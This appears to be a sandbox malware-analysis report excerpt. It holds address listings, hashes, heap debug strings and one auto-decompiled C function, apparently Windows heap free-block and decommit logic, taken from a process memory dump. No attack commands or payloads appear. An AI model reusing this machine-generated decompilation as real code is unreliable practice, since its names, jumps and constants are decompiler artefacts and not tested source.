                                                  0x01674835
                                                  0x0167483b
                                                  0x0167483f
                                                  0x0167485e
                                                  0x01674863
                                                  0x01674841
                                                  0x01674856
                                                  0x0167485b
                                                  0x01674869
                                                  0x0167486c
                                                  0x0167486f
                                                  0x016747e7
                                                  0x016747e7
                                                  0x00000000
                                                  0x016747ec
                                                  0x016747aa
                                                  0x016747b0
                                                  0x016747b4
                                                  0x016747d3
                                                  0x016747d8
                                                  0x016747b6
                                                  0x016747cb
                                                  0x016747d0
                                                  0x016747de
                                                  0x016747df
                                                  0x016747e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0167476f
                                                  0x0167476f
                                                  0x01674778
                                                  0x01674785
                                                  0x01674787
                                                  0x0167478c
                                                  0x0167478e
                                                  0x00000000
                                                  0x00000000
                                                  0x01674790
                                                  0x01674792
                                                  0x01674794
                                                  0x00000000
                                                  0x00000000
                                                  0x01674796
                                                  0x01674799
                                                  0x00000000
                                                  0x01674799
                                                  0x00000000
                                                  0x016745c3
                                                  0x016745c3
                                                  0x016745c7
                                                  0x016745c7
                                                  0x016745ca
                                                  0x016745cf
                                                  0x016745d3
                                                  0x016745df
                                                  0x016745e4
                                                  0x016745e6
                                                  0x016745e8
                                                  0x016745ed
                                                  0x016745ed
                                                  0x016745f2
                                                  0x016745f2
                                                  0x016745f7
                                                  0x016745fc
                                                  0x01674602
                                                  0x01674606
                                                  0x01674609
                                                  0x0167460f
                                                  0x016746de
                                                  0x016746e3
                                                  0x016746e5
                                                  0x016746ec
                                                  0x016746ee
                                                  0x016746f6
                                                  0x016746f6
                                                  0x016746f6
                                                  0x016746f6
                                                  0x016746ec
                                                  0x01674615
                                                  0x01674615
                                                  0x0167461d
                                                  0x0167462e
                                                  0x0167462e
                                                  0x0167461d
                                                  0x0167460f
                                                  0x01674609
                                                  0x016746fd
                                                  0x00000000
                                                  0x00000000
                                                  0x01674710
                                                  0x0167471a
                                                  0x01674720
                                                  0x01674720
                                                  0x01674722
                                                  0x0167472c
                                                  0x00000000
                                                  0x0167472e
                                                  0x0167472e
                                                  0x00000000
                                                  0x0167472e
                                                  0x0167472c
                                                  0x01674738
                                                  0x0167473c
                                                  0x0167474b
                                                  0x01674751
                                                  0x01674751
                                                  0x00000000
                                                  0x0167473c
                                                  0x016748f4
                                                  0x016748f4
                                                  0x00000000
                                                  0x016748f4

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                  • API String ID: 0-1357697941
                                                  • Opcode ID: 9acf61d07c1445c671cfd75f48f4e35ccd12de203f2fdeed6156f361f8cf46bc
                                                  • Instruction ID: 57d02786848c255a1bc479681286911e1490a113b220c27d9ad170d917b3cea7
                                                  • Opcode Fuzzy Hash: 9acf61d07c1445c671cfd75f48f4e35ccd12de203f2fdeed6156f361f8cf46bc
                                                  • Instruction Fuzzy Hash: 20F11F3160064ADFDB25CFA9C888BBAFBF5FF49304F188019E1469B741DB74A986CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E015DA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x16a8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E015DA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E015DDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E015B9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E015BA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x16a8748 - 1;
						if( *0x16a8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E015BB150();
								__eflags =  *0x16a7bc8;
								if( *0x16a7bc8 == 0) {
									__eflags = 1;
									E01672073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x16a8748 - 1;
							if( *0x16a8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E015E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E015D7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E016714FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E015B9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E015B9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x16a8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E015BB150();
											} else {
												E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E015BB150();
											_pop(_t491);
											__eflags =  *0x16a7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01672073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0167A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E015DA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E015D7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E015D7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01671411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E015D7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E015D7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x16a8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E015BB150();
							__eflags =  *0x16a7bc8;
							if( *0x16a7bc8 == 0) {
								__eflags = 0;
								E01672073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x16a8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E015BB150();
												} else {
													E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E015BB150();
												__eflags =  *0x16a7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01672073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0167A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E015DA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E015DB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E015DA830(_t553, _v64, _v24);
								_t286 = E015D7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E015D7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01671411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E015D7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E015D7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01671411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E015E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E015DB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E015D7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E016714FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E015D99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E015DA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E015EABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                  0x015da309
                                                  0x015da316
                                                  0x015da319
                                                  0x015da31d
                                                  0x015da32d
                                                  0x015da331
                                                  0x01621e0d
                                                  0x01621e10
                                                  0x015da3cb
                                                  0x015da3cb
                                                  0x015da3bd
                                                  0x015da3c3
                                                  0x015da3c3
                                                  0x015da33a
                                                  0x01621e17
                                                  0x01621e1b
                                                  0x01621e1d
                                                  0x01621e2f
                                                  0x01621e34
                                                  0x01621e36
                                                  0x01621e3c
                                                  0x01621e3c
                                                  0x01621e3c
                                                  0x01621e3c
                                                  0x01621e36
                                                  0x01621e42
                                                  0x01621e45
                                                  0x01621e47
                                                  0x015da3f8
                                                  0x015da3f8
                                                  0x015da3fb
                                                  0x015da3fd
                                                  0x01621e50
                                                  0x015da403
                                                  0x015da411
                                                  0x015da411
                                                  0x015da411
                                                  0x015da41e
                                                  0x015da420
                                                  0x015da424
                                                  0x015da427
                                                  0x015da7c9
                                                  0x015da7cd
                                                  0x015da7d2
                                                  0x015da7d9
                                                  0x015da7e0
                                                  0x015da7e3
                                                  0x015da7ed
                                                  0x015da7f3
                                                  0x015da7f9
                                                  0x015da7ff
                                                  0x015da802
                                                  0x015da807
                                                  0x015da809
                                                  0x015da809
                                                  0x015da809
                                                  0x015da80f
                                                  0x015da80f
                                                  0x015da812
                                                  0x015da81c
                                                  0x015da821
                                                  0x015da824
                                                  0x015da42d
                                                  0x015da42d
                                                  0x015da42d
                                                  0x015da42d
                                                  0x015da42d
                                                  0x015da436
                                                  0x015da43a
                                                  0x015da609
                                                  0x015da60d
                                                  0x015da612
                                                  0x015da616
                                                  0x015da61a
                                                  0x01621e57
                                                  0x01621e59
                                                  0x00000000
                                                  0x00000000
                                                  0x01621e5f
                                                  0x015da620
                                                  0x015da627
                                                  0x01621e64
                                                  0x01621e66
                                                  0x01621e6c
                                                  0x01621e72
                                                  0x01621e76
                                                  0x01621e95
                                                  0x01621e9a
                                                  0x01621e78
                                                  0x01621e8d
                                                  0x01621e92
                                                  0x01621ea0
                                                  0x01621ea5
                                                  0x01621eaa
                                                  0x01621eb2
                                                  0x01621eb6
                                                  0x01621eb9
                                                  0x01621eb9
                                                  0x01621ebe
                                                  0x01621ec2
                                                  0x01621ec2
                                                  0x01621e66
                                                  0x015da62d
                                                  0x015da633
                                                  0x015da636
                                                  0x015da63a
                                                  0x015da63c
                                                  0x015da640
                                                  0x015da642
                                                  0x015da644
                                                  0x015da644
                                                  0x015da644
                                                  0x015da64d
                                                  0x015da64d
                                                  0x015da651
                                                  0x015da655
                                                  0x01621eca
                                                  0x01621ed1
                                                  0x00000000
                                                  0x00000000
                                                  0x01621ed7
                                                  0x00000000
                                                  0x015da65b
                                                  0x015da669
                                                  0x015da66e
                                                  0x015da670
                                                  0x00000000
                                                  0x00000000
                                                  0x015da676
                                                  0x015da67b
                                                  0x015da680
                                                  0x015da682
                                                  0x01621f1a
                                                  0x015da688
                                                  0x015da688
                                                  0x015da688
                                                  0x015da68a
                                                  0x015da68d
                                                  0x01621f24
                                                  0x01621f2a
                                                  0x01621f31
                                                  0x01621f43
                                                  0x01621f43
                                                  0x01621f31
                                                  0x015da693
                                                  0x015da697
                                                  0x015da69d
                                                  0x015da6a0
                                                  0x015da6a6
                                                  0x015da6a8
                                                  0x015da6a8
                                                  0x015da6a8
                                                  0x015da6a8
                                                  0x015da6b2
                                                  0x015da6b7
                                                  0x015da6c1
                                                  0x015da6c6
                                                  0x015da6d2
                                                  0x015da6d9
                                                  0x015da6e3
                                                  0x015da6e6
                                                  0x015da6eb
                                                  0x015da6ed
                                                  0x015da6ed
                                                  0x015da6ed
                                                  0x015da6ed
                                                  0x015da6f3
                                                  0x015da6f8
                                                  0x015da702
                                                  0x015da70a
                                                  0x015da70e
                                                  0x015da71a
                                                  0x015da71e
                                                  0x01621fcb
                                                  0x01621fcf
                                                  0x01621fdd
                                                  0x01621fe3
                                                  0x01621fe3
                                                  0x015da724
                                                  0x015da728
                                                  0x015da72a
                                                  0x015da72d
                                                  0x015da737
                                                  0x015da73a
                                                  0x015da73c
                                                  0x015da742
                                                  0x015da748
                                                  0x01621f4d
                                                  0x01621f50
                                                  0x01621f56
                                                  0x01621f5c
                                                  0x01621f5f
                                                  0x01621f7e
                                                  0x01621f83
                                                  0x01621f61
                                                  0x01621f76
                                                  0x01621f7b
                                                  0x01621f89
                                                  0x01621f8e
                                                  0x01621f93
                                                  0x01621f94
                                                  0x01621f9a
                                                  0x01621f9c
                                                  0x01621f9e
                                                  0x01621fa1
                                                  0x01621fa1
                                                  0x01621fa6
                                                  0x01621fa6
                                                  0x01621f50
                                                  0x015da74e
                                                  0x015da751
                                                  0x015da754
                                                  0x015da75d
                                                  0x015da75e
                                                  0x015da762
                                                  0x015da767
                                                  0x01621faf
                                                  0x01621fb0
                                                  0x01621fb9
                                                  0x01621fbe
                                                  0x01621fc2
                                                  0x01621fc2
                                                  0x015da76d
                                                  0x015da76d
                                                  0x015da775
                                                  0x015da778
                                                  0x015da77d
                                                  0x015da77d
                                                  0x015da71e
                                                  0x015da782
                                                  0x015da787
                                                  0x015da789
                                                  0x01621ff3
                                                  0x015da78f
                                                  0x015da78f
                                                  0x015da78f
                                                  0x015da791
                                                  0x015da794
                                                  0x01621ffd
                                                  0x01622006
                                                  0x0162200c
                                                  0x01622017
                                                  0x01622019
                                                  0x01622024
                                                  0x01622024
                                                  0x01622024
                                                  0x01622047
                                                  0x01622047
                                                  0x0162200c
                                                  0x015da79a
                                                  0x015da79f
                                                  0x015da7a4
                                                  0x015da7a9
                                                  0x015da7ab
                                                  0x0162205a
                                                  0x015da7b1
                                                  0x015da7b1
                                                  0x015da7b1
                                                  0x015da7b3
                                                  0x015da7b6
                                                  0x00000000
                                                  0x015da7bc
                                                  0x01622066
                                                  0x01622068
                                                  0x01622073
                                                  0x01622073
                                                  0x01622073
                                                  0x01622078
                                                  0x01622079
                                                  0x0162207d
                                                  0x00000000
                                                  0x0162207d
                                                  0x015da7b6
                                                  0x015da440
                                                  0x015da440
                                                  0x015da440
                                                  0x015da446
                                                  0x015da44c
                                                  0x015da44f
                                                  0x015da453
                                                  0x015da455
                                                  0x016220b3
                                                  0x016220b9
                                                  0x016220b9
                                                  0x015da45d
                                                  0x015da460
                                                  0x015da464
                                                  0x015da466
                                                  0x015da46b
                                                  0x015da46f
                                                  0x015da471
                                                  0x015da471
                                                  0x015da471
                                                  0x015da474
                                                  0x015da479
                                                  0x015da47d
                                                  0x015da47f
                                                  0x01622229
                                                  0x0162222f
                                                  0x015da3c8
                                                  0x015da3c8
                                                  0x015da3ca
                                                  0x015da3ca
                                                  0x00000000
                                                  0x015da3ca
                                                  0x01622235
                                                  0x0162223a
                                                  0x0162223a
                                                  0x00000000
                                                  0x00000000
                                                  0x01622240
                                                  0x01622246
                                                  0x0162224a
                                                  0x01622269
                                                  0x0162226e
                                                  0x0162224c
                                                  0x01622261
                                                  0x01622266
                                                  0x01622274
                                                  0x01622279
                                                  0x0162227e
                                                  0x01622286
                                                  0x01622288
                                                  0x0162228d
                                                  0x0162228d
                                                  0x01622292
                                                  0x01622292
                                                  0x01622295
                                                  0x01622295
                                                  0x00000000
                                                  0x01622295
                                                  0x015da485
                                                  0x015da489
                                                  0x015da48b
                                                  0x015da48f
                                                  0x015da493
                                                  0x015da497
                                                  0x015da49b
